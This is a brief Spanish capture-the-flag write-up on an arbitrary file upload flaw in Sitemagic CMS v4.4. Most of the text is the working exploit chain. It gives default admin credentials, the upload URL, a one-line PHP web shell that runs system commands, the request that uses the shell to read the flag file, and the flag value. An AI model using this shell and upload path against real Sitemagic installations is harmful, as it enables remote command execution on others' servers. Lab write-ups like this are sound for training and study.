1. Título
Introducción al objetivo:
Sitemagic CMS v4.4 index.php?SMExt=SMFiles tiene una vulnerabilidad de carga de archivos arbitrarios que permite a un atacante cargar código malicioso para ejecutar comandos del sistema.
Ingrese al tema:
administrador/administrador
/index.php?SMExt=SMFiles&SMTemplateType=Básico&SMExecMode=Dedicado&SMFilesUpload&SMFilesUploadPath=archivos%2Fimages
Troyano de una frase:
system.php
<?php system($_GET[1]);phpinfo();?>
/files/images/system.php?1=cat ///bandera
bandera{35a77803-ae47-4b5e-a937-d71f263c8a79}